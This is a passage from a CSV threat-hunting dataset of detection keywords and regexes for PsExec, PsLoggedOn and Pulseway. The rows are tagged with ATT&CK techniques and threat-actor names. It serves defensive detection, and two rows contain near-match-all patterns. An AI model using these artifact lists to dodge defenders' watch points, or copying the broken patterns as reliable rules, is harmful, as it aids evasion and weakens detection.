install persistent threats. and evade some security systems. ","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","#registry","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*\Windows\Prefetch\PSEXEC*",".{0,1000}\\Windows\\Prefetch\\PSEXEC.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. 
or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*\Windows\PSEXEC-*.key*",".{0,1000}\\Windows\\PSEXEC\-.{0,1000}\.key.{0,1000}","greyware_tool_keyword","psexec",".key file created and deleted on the target system","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","contain the hostname of the attacker in the file name","10","10","N/A","N/A","N/A","N/A" "*PSEXEC-*.key*",".{0,1000}PSEXEC\-.{0,1000}\.key.{0,1000}","greyware_tool_keyword","psexec",".key file created and deleted on the target system","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon 
- Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*PsExec[1].exe*",".{0,1000}PsExec\[1\]\.exe.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*PsExec64.exe*",".{0,1000}PsExec64\.exe.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. 
or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*PSEXECSVC*",".{0,1000}PSEXECSVC.{0,1000}","greyware_tool_keyword","psexec","PsExec is a legitimate Microsoft tool for remote administration. However. attackers can misuse it to execute malicious commands or software on other network machines. install persistent threats. and evade some security systems. ","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","#servicename","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*PSEXECSVC.EXE-*.pf*",".{0,1000}PSEXECSVC\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","psexec","prefetch - .key file created and deleted on the target system","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - 
FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*PsLoggedon.exe*",".{0,1000}PsLoggedon\.exe.{0,1000}","greyware_tool_keyword","psloggedon","PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. or a remote one","T1003 - T1049 - T1057 - T1082 - T1087 - T1518","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon","1","1","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "*PsLoggedon64.exe*",".{0,1000}PsLoggedon64\.exe.{0,1000}","greyware_tool_keyword","psloggedon","PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. 
or a remote one","T1003 - T1049 - T1057 - T1082 - T1087 - T1518","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon","1","1","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "* Received Request Run command **",".{0,1000}\s\Received\sRequest\sRun\scommand\s.{0,1000}\<\/Data\>.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* PCMonitorManager.exe*",".{0,1000}\sPCMonitorManager\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* PCMonitorSrv.exe*",".{0,1000}\sPCMonitorSrv\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* pulseway_x64.deb*",".{0,1000}\spulseway_x64\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* Pulseway_x64.msi*",".{0,1000}\sPulseway_x64\.msi.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* pulseway_x86.deb*",".{0,1000}\spulseway_x86\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/pulseway/config.xml*",".{0,1000}\/etc\/pulseway\/config\.xml.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/PCMonitorManager.exe*",".{0,1000}\/PCMonitorManager\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/PCMonitorSrv.exe*",".{0,1000}\/PCMonitorSrv\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool 
designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/pcmrdp-client.dll*",".{0,1000}\/pcmrdp\-client\.dll.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/pulseway_x64.deb*",".{0,1000}\/pulseway_x64\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Pulseway_x64.msi*",".{0,1000}\/Pulseway_x64\.msi.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/pulseway_x86.deb*",".{0,1000}\/pulseway_x86\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/systemd/system/pulseway.service*",".{0,1000}\/systemd\/system\/pulseway\.service.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/sbin/pulseway*",".{0,1000}\/usr\/sbin\/pulseway.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/sbin/pulsewayd*",".{0,1000}\/usr\/sbin\/pulsewayd.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\*\RemoteDesktop.exe*",".{0,1000}\\AppData\\Roaming\\.{0,1000}\\RemoteDesktop\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\AppData\Roaming\*\uac.tmp",".{0,1000}\\AppData\\Roaming\\.{0,1000}\\uac\.tmp","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\MMSOFT Design\PC Monitor*",".{0,1000}\\MMSOFT\sDesign\\PC\sMonitor.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\MMSOFT Design\Pulseway\*",".{0,1000}\\MMSOFT\sDesign\\Pulseway\\.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\PCMonitorManager.exe*",".{0,1000}\\PCMonitorManager\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PCMonitorSrv.exe*",".{0,1000}\\PCMonitorSrv\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and 
manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PCMonitorTypes.dll*",".{0,1000}\\PCMonitorTypes\.dll.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pcmrdp-client.dll*",".{0,1000}\\pcmrdp\-client\.dll.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pcmupdate.exe*",".{0,1000}\\pcmupdate\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pcmupdate.exe.config*",".{0,1000}\\pcmupdate\.exe\.config.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Pulseway 
Remote Control\*",".{0,1000}\\Pulseway\sRemote\sControl\\.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Pulseway\*",".{0,1000}\\Pulseway\\.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pulseway_x64.deb*",".{0,1000}\\pulseway_x64\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Pulseway_x64.msi*",".{0,1000}\\Pulseway_x64\.msi.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pulseway_x86.deb*",".{0,1000}\\pulseway_x86\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 
- T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PulsewayServiceCheck*",".{0,1000}\\PulsewayServiceCheck.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\pwyrc-agent.dll*",".{0,1000}\\pwyrc\-agent\.dll.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pwy-rd\shell\open\command*",".{0,1000}\\pwy\-rd\\shell\\open\\command.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\RemoteDesktop_x64.msi*",".{0,1000}\\RemoteDesktop_x64\.msi.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\SOFTWARE\Microsoft\Tracing\PCMonitorSrv_RAS*",".{0,1000}\\SOFTWARE\\Microsoft\\Tracing\\PCMonitorSrv_RAS.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Tasks\PulsewayServiceCheck*",".{0,1000}\\Tasks\\PulsewayServiceCheck.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Pulseway Remote Control*",".{0,1000}\Pulseway\sRemote\sControl\<\/Data\>.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Received Request Execute automation * script * from device Id*",".{0,1000}\Received\sRequest\sExecute\sautomation\s.{0,1000}\sscript\s.{0,1000}\sfrom\sdevice\sId.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Received Request Get RD pool score 
*pulseway.com/remote*",".{0,1000}\Received\sRequest\sGet\sRD\spool\sscore\s.{0,1000}pulseway\.com\/remote.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "**",".{0,1000}\.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "**",".{0,1000}\.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://*.pulseway.com/app/main/*",".{0,1000}https\:\/\/.{0,1000}\.pulseway\.com\/app\/main\/.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Pulseway -- Installation completed successfully*",".{0,1000}Pulseway\s\-\-\sInstallation\scompleted\ssuccessfully.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT 
administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Pulseway -- Removal completed successfully*",".{0,1000}Pulseway\s\-\-\sRemoval\scompleted\ssuccessfully.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Pulseway Remote Control -- Installation completed successfully*",".{0,1000}Pulseway\sRemote\sControl\s\-\-\sInstallation\scompleted\ssuccessfully.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Pulseway Remote Control.lnk*",".{0,1000}Pulseway\sRemote\sControl\.lnk.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*pulseway_x64.pkg.tar.xz*",".{0,1000}pulseway_x64\.pkg\.tar\.xz.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - 
abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*pwyrc-clip.exe*",".{0,1000}pwyrc\-clip\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rd-asia-au-1.pulseway.com*",".{0,1000}rd\-asia\-au\-1\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rd-eu-de-1.pulseway.com*",".{0,1000}rd\-eu\-de\-1\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 